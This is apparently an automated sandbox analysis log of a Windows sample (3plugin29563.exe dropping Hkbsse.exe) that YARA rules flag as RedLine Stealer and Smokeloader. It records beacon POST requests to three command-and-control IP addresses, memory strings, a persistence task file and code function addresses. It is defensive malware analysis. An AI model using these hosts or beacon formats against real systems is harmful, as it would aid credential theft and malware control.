r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Source: global traffic	HTTP traffic detected: POST /hb9IvshS02/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 89.23.103.42Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Source: global traffic	HTTP traffic detected: POST /hb9IvshS03/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.209.162.226Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Source: global traffic	HTTP traffic detected: POST /hb9IvshS01/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.208.158.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /hb9IvshS01/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.208.158.116Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Source: global traffic	HTTP traffic detected: POST /hb9IvshS03/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.209.162.226Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /hb9IvshS01/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.208.158.116Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /hb9IvshS03/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.209.162.226Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C
Source: global traffic	HTTP traffic detected: POST /hb9IvshS01/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.208.158.116Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 38 41 34 39 33 32 35 30 34 31 31 44 34 42 38 32 31 39 33 45 39 35 45 35 42 42 31 37 41 33 44 35 37 36 35 45 37 42 39 36 46 42 44 32 42 42 31 33 45 43 42 39 34 35 45 42 44 31 41 32 31 38 43 42 35 38 39 30 42 38 44 42 39 39 38 32 36 45 31 37 43 42 35 33 32 30 37 30 38 41 46 33 33 36 37 41 43 30 41 31 37 46 43 36 45 30 38 46 41 32 38 36 31 32 31 35 37 35 31 33 44 42 37 43 33 34 39 34 37 36 30 36 36 33 37 35 39 36 34 46 33 43 38 32 38 36 45 46 43 37 30 46 34 43 38 36 31 43 Data Ascii: r=8A493250411D4B82193E95E5BB17A3D5765E7B96FBD2BB13ECB945EBD1A218CB5890B8DB99826E17CB5320708AF3367AC0A17FC6E08FA28612157513DB7C349476066375964F3C8286EFC70F4C861C

Source: Joe Sandbox View	ASN Name: SIMPLECARRER2IT SIMPLECARRER2IT
Source: Joe Sandbox View	ASN Name: MAXITEL-ASRU MAXITEL-ASRU
Source: Joe Sandbox View	ASN Name: HOSTING-SOLUTIONSUS HOSTING-SOLUTIONSUS

Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.103.42
Source: unknown	TCP traffic detected without corresponding DNS query: 185.209.162.226
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.158.116
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.103.42
Source: unknown	TCP traffic detected without corresponding DNS query: 185.209.162.226
Source: unknown	TCP traffic detected without corresponding DNS query: 185.209.162.226
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.103.42
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.158.116
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.158.116
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.158.116
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.158.116
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.158.116
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.158.116
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.158.116
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.158.116
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.158.116
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.158.116
Source: unknown	TCP traffic detected without corresponding DNS query: 185.209.162.226
Source: unknown	TCP traffic detected without corresponding DNS query: 185.209.162.226
Source: unknown	TCP traffic detected without corresponding DNS query: 185.209.162.226
Source: unknown	TCP traffic detected without corresponding DNS query: 185.209.162.226
Source: unknown	TCP traffic detected without corresponding DNS query: 185.209.162.226
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.158.116
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.158.116
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.158.116
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.158.116
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.158.116
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.158.116
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.158.116
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.158.116
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.158.116
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.158.116
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.158.116
Source: unknown	TCP traffic detected without corresponding DNS query: 185.209.162.226
Source: unknown	TCP traffic detected without corresponding DNS query: 185.209.162.226
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.158.116
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.158.116
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.158.116
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.158.116
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.158.116
Source: unknown	TCP traffic detected without corresponding DNS query: 185.209.162.226
Source: unknown	TCP traffic detected without corresponding DNS query: 185.209.162.226
Source: unknown	TCP traffic detected without corresponding DNS query: 185.209.162.226
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.103.42
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.158.116
Source: unknown	TCP traffic detected without corresponding DNS query: 185.209.162.226
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.158.116
Source: unknown	TCP traffic detected without corresponding DNS query: 185.209.162.226
Source: unknown	TCP traffic detected without corresponding DNS query: 89.23.103.42
Source: unknown	TCP traffic detected without corresponding DNS query: 185.208.158.116

Source: C:\Users\user\Desktop\3plugin29563.exe

Code function: 0_2_0040A879 SetCurrentDirectoryA,GetUserNameA,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,GetLocalTime,CoUninitialize,CoInitialize,CoCreateInstance,CoUninitialize,CoUninitialize,CoUninitialize,CreateFileA,InternetOpenA,InternetOpenUrlA,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,RemoveDirectoryA,

0_2_0040A879

Source: unknown

HTTP traffic detected: POST /hb9IvshS03/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.209.162.226Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s

Source: Hkbsse.exe, 00000015.00000003.2428910654.0000000000835000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.208.158.116/
Source: Hkbsse.exe, 00000015.00000003.4524612993.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000003.2428910654.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558467776.0000000000835000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.208.158.116/en-US
Source: Hkbsse.exe, 00000015.00000003.2428910654.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4557121195.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558467776.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4559743688.0000000003309000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558467776.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558221979.0000000000808000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558467776.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.208.158.116/hb9IvshS01/index.php
Source: Hkbsse.exe, 00000015.00000003.4524612993.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000003.2428910654.0000000000835000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.208.158.116/hb9IvshS01/index.php#
Source: Hkbsse.exe, 00000015.00000002.4557121195.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.208.158.116/hb9IvshS01/index.php.
Source: Hkbsse.exe, 00000015.00000003.4524612993.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558467776.0000000000852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.208.158.116/hb9IvshS01/index.php/#
Source: Hkbsse.exe, 00000015.00000002.4557121195.00000000007BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.208.158.116/hb9IvshS01/index.php0
Source: Hkbsse.exe, 00000015.00000002.4557121195.00000000007BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.208.158.116/hb9IvshS01/index.php2f
Source: Hkbsse.exe, 00000015.00000002.4557121195.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.208.158.116/hb9IvshS01/index.php6
Source: Hkbsse.exe, 00000015.00000003.4524612993.0000000000835000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.208.158.116/hb9IvshS01/index.php774809c7ff7ced665178.
Source: Hkbsse.exe, 00000015.00000003.4524612993.0000000000835000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.208.158.116/hb9IvshS01/index.php774809c7ff7ced665178A
Source: Hkbsse.exe, 00000015.00000003.4524612993.0000000000835000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.208.158.116/hb9IvshS01/index.php8ZCqAVXugLRw254fTMM=
Source: Hkbsse.exe, 00000015.00000002.4557121195.00000000007FB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.208.158.116/hb9IvshS01/index.php:
Source: Hkbsse.exe, 00000015.00000003.4524612993.000000000082B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.208.158.116/hb9IvshS01/index.phpO
Source: Hkbsse.exe, 00000015.00000002.4558467776.0000000000835000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.208.158.116/hb9IvshS01/index.php_
Source: Hkbsse.exe, 00000015.00000003.4525916182.0000000000806000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558221979.0000000000808000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.208.158.116/hb9IvshS01/index.phpded
Source: Hkbsse.exe, 00000015.00000003.4524612993.0000000000835000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.208.158.116/hb9IvshS01/index.phpded)G
Source: Hkbsse.exe, 00000015.00000003.4524612993.0000000000835000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.208.158.116/hb9IvshS01/index.phpdedLG
Source: Hkbsse.exe, 00000015.00000002.4557121195.00000000007BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.208.158.116/hb9IvshS01/index.phpfgNd
Source: Hkbsse.exe, 00000015.00000003.4524612993.0000000000835000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.208.158.116/hb9IvshS01/index.phpg
Source: Hkbsse.exe, 00000015.00000003.4524612993.000000000082B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.208.158.116/hb9IvshS01/index.phpiO
Source: Hkbsse.exe, 00000015.00000003.4524612993.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000003.2428910654.0000000000835000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.208.158.116/hb9IvshS01/index.phpk
Source: Hkbsse.exe, 00000015.00000003.4524612993.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000003.2428910654.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558467776.0000000000835000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.208.158.116/hb9IvshS01/index.phps
Source: Hkbsse.exe, 00000015.00000002.4557121195.00000000007BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.208.158.116/hb9IvshS01/index.phptgpd3
Source: Hkbsse.exe, 00000015.00000003.2428910654.0000000000835000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.208.158.116/hb9IvshS01/index.phpvy
Source: Hkbsse.exe, 00000015.00000003.4524612993.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4557121195.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558467776.0000000000852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.208.158.116/hb9IvshS01/index.php~
Source: Hkbsse.exe, 00000015.00000003.2428910654.0000000000835000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.209.162.226/
Source: Hkbsse.exe, 00000015.00000002.4557121195.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000003.2428910654.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4557121195.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558467776.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558221979.0000000000808000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558467776.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.209.162.226/hb9IvshS03/index.php
Source: Hkbsse.exe, 00000015.00000002.4558467776.0000000000835000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.209.162.226/hb9IvshS03/index.php#
Source: Hkbsse.exe, 00000015.00000003.2428910654.0000000000835000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.209.162.226/hb9IvshS03/index.php)G
Source: Hkbsse.exe, 00000015.00000002.4558467776.000000000084F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.209.162.226/hb9IvshS03/index.php5y
Source: Hkbsse.exe, 00000015.00000002.4557121195.00000000007BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.209.162.226/hb9IvshS03/index.php6
Source: Hkbsse.exe, 00000015.00000002.4557121195.00000000007BC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.209.162.226/hb9IvshS03/index.phpXc
Source: Hkbsse.exe, 00000015.00000003.4524612993.0000000000835000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.209.162.226/hb9IvshS03/index.php_
Source: Hkbsse.exe, 00000015.00000002.4557121195.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558467776.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558221979.0000000000808000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.209.162.226/hb9IvshS03/index.phpded
Source: Hkbsse.exe, 00000015.00000002.4558221979.0000000000808000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.209.162.226/hb9IvshS03/index.phpdedL
Source: Hkbsse.exe, 00000015.00000002.4558467776.0000000000835000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.209.162.226/hb9IvshS03/index.phpdedWG
Source: Hkbsse.exe, 00000015.00000003.4524612993.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000003.2428910654.0000000000835000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.209.162.226/hb9IvshS03/index.phpdedtG
Source: Hkbsse.exe, 00000015.00000003.2428910654.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558467776.0000000000835000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.209.162.226/hb9IvshS03/index.phpg
Source: Hkbsse.exe, 00000015.00000002.4558467776.0000000000835000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.209.162.226/hb9IvshS03/index.phpk
Source: Hkbsse.exe, 00000015.00000002.4558467776.0000000000852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.23.103.42/hb9IvshS02/index.php
Source: Hkbsse.exe, 00000015.00000003.4524612993.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558467776.0000000000852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.23.103.42/hb9IvshS02/index.php.dg4
Source: Hkbsse.exe, 00000015.00000003.4524612993.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000003.2428910654.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558467776.0000000000835000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.23.103.42/hb9IvshS02/index.php?
Source: Hkbsse.exe, 00000015.00000003.4524612993.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000003.2428910654.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558467776.0000000000835000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.23.103.42/hb9IvshS02/index.phpC
Source: Hkbsse.exe, 00000015.00000003.4524612993.0000000000826000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.23.103.42/hb9IvshS02/index.phpEZ
Source: Hkbsse.exe, 00000015.00000003.2428910654.0000000000835000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.23.103.42/hb9IvshS02/index.php_
Source: Hkbsse.exe, 00000015.00000002.4558467776.0000000000835000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.23.103.42/hb9IvshS02/index.phphG
Source: Hkbsse.exe, 00000015.00000003.4524612993.0000000000835000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4557121195.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558467776.0000000000835000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.23.103.42/hb9IvshS02/index.phphp
Source: Hkbsse.exe, 00000015.00000003.4525916182.0000000000806000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.23.103.42/hb9IvshS02/index.phphpded
Source: Hkbsse.exe, 00000015.00000003.4524612993.0000000000852000.00000004.00000020.00020000.00000000.sdmp, Hkbsse.exe, 00000015.00000002.4558467776.0000000000852000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.23.103.42/hb9IvshS02/index.phpke
Source: Hkbsse.exe, 00000015.00000003.4525916182.0000000000806000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://89.23.103.42/hb9IvshS02/index.phpncoded
Source: Amcache.hve.4.dr	String found in binary or memory: http://upx.sf.net

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2286201427.0000000000783000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000015.00000002.4556167209.0000000000783000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000015.00000002.4554199163.00000000006F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2286436094.0000000002110000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_0041CB37 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,		0_2_0041CB37
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_0041CB37 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,		21_2_0041CB37

Source: C:\Users\user\Desktop\3plugin29563.exe

File created: C:\Windows\Tasks\Hkbsse.job

Jump to behavior

Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_00409870	0_2_00409870
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_0040A879	0_2_0040A879
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_004430D8	0_2_004430D8
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_00426132	0_2_00426132
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_004215A2	0_2_004215A2
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_004476CB	0_2_004476CB
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_004477EB	0_2_004477EB
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_00448790	0_2_00448790
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_00404AF0	0_2_00404AF0
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_00442C40	0_2_00442C40
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_00404CF0	0_2_00404CF0
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_00437DF3	0_2_00437DF3
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_00423D91	0_2_00423D91
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_00420DB3	0_2_00420DB3
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_00446F79	0_2_00446F79
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_007B7E87	0_2_007B7E87
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_02136399	0_2_02136399
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_0213101A	0_2_0213101A
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_0214805A	0_2_0214805A
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_021571E0	0_2_021571E0
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_02157A52	0_2_02157A52
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_02131809	0_2_02131809
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_02157932	0_2_02157932
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_021589F7	0_2_021589F7
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_02152EA7	0_2_02152EA7
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_02114F57	0_2_02114F57
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_02133FF8	0_2_02133FF8
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_02114D57	0_2_02114D57
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_00426132	21_2_00426132
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_0040E390	21_2_0040E390
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_00448790	21_2_00448790
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_00404AF0	21_2_00404AF0
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_00442C40	21_2_00442C40
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_00404CF0	21_2_00404CF0
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_00420DB3	21_2_00420DB3
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_00446F79	21_2_00446F79
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_004430D8	21_2_004430D8
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_004215A2	21_2_004215A2
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_004476CB	21_2_004476CB
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_004477EB	21_2_004477EB
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_00437DF3	21_2_00437DF3
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_00423D91	21_2_00423D91
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_0072805A	21_2_0072805A
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_00716399	21_2_00716399
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_007389F7	21_2_007389F7
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_006F4D57	21_2_006F4D57
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_00732EA7	21_2_00732EA7
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_006F4F57	21_2_006F4F57
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_0071101A	21_2_0071101A
